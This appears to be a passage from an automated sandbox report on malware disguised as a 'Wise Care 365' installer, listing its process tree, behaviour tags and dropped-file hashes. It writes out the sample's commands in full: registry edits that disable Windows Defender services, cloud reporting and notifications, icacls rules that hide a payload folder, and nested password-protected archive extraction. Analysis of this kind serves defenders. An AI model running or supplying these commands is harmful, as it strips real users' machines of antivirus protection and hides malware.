C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f6⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f6⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Modifies security service
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Modifies security service
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\executer.bat" "5⤵
-
C:\Windows\SysWOW64\mode.commode 65,106⤵
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e file.zip -p___________24671pwd16377pwd22378___________ -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_9.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_8.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_7.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_6.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_5.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_4.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_3.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_2.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_1.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\ielowutil.exe"ielowutil.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe"C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\umciavi32.exe"C:\Users\Admin\AppData\Local\Temp\umciavi32.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"9⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"10⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"10⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"10⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe"C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe"8⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 459⤵
-
C:\Windows\system32\timeout.exetimeout 4510⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet002.bat" "5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 90 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.execmd /c rd /q /s "C:\ProgramData\ConsoleApp\"6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe"C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp"C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$30206,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f1⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f1⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f1⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f1⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f1⤵
- Executes dropped EXE
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\ConsoleApp\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\ConsoleApp\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\ConsoleApp\ControlSet000.batFilesize
1KB
MD5484c8df5d5bd9d82f4ac1861472cf519
SHA1eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA5126cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7
-
C:\ProgramData\ConsoleApp\ControlSet001.batFilesize
12KB
MD50488c70e96c520bbebbf0e2fed900acc
SHA1e48b076ed4b85b607e719cb4b226382dd35efa03
SHA256e3b1f1a7f0bf75d6c7c144843f84c209ba13813302db3bd625344d3ce9ae6052
SHA512f96a804cc50a6fc3aa7da9c1949f7f1f88845f288b3b391d12e3649321b25b5a168ddc63f8ba8cd4886df488b302d9d16a0fcb0bebddd1437754e849749ef9d8
-
C:\ProgramData\ConsoleApp\ControlSet003.vbsFilesize
6KB
MD509362984bedb41d6b8789abcd5dadfe6
SHA13e795b8470277026c8ba36911a1965cbf0d0323a
SHA256dcca2bd778a84917e846b0e3d29df8c791dc27b225cde41277e466d5d9745162
SHA512c9009b2495852eeec3b2894896826fd1d8759f4252283486a97b3463cca3bf4fef997714fd7915ec30c5318cf43d40185e22ea130e4423d34884cbc3f98b6c60
-
C:\ProgramData\ConsoleApp\hfile.binFilesize
2.1MB
MD5706bb6fe5e28685d8065c7e31e588077
SHA12512551f704a26ddcc5490ec54ad8ca8e9a36f5e
SHA256115925d3dffde9ce53d43897ac4c909df00d40177d3ed05384e890af099bd785
SHA512f20e50816907270b63a6a16b13fdf0f9eab409c4d646bcef8cd2445c3410020df021d7fb68fa81702f167368ce03cd8519f1777f06fe2932658a6c768fcea833
-
C:\ProgramData\ConsoleApp\kernel32.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
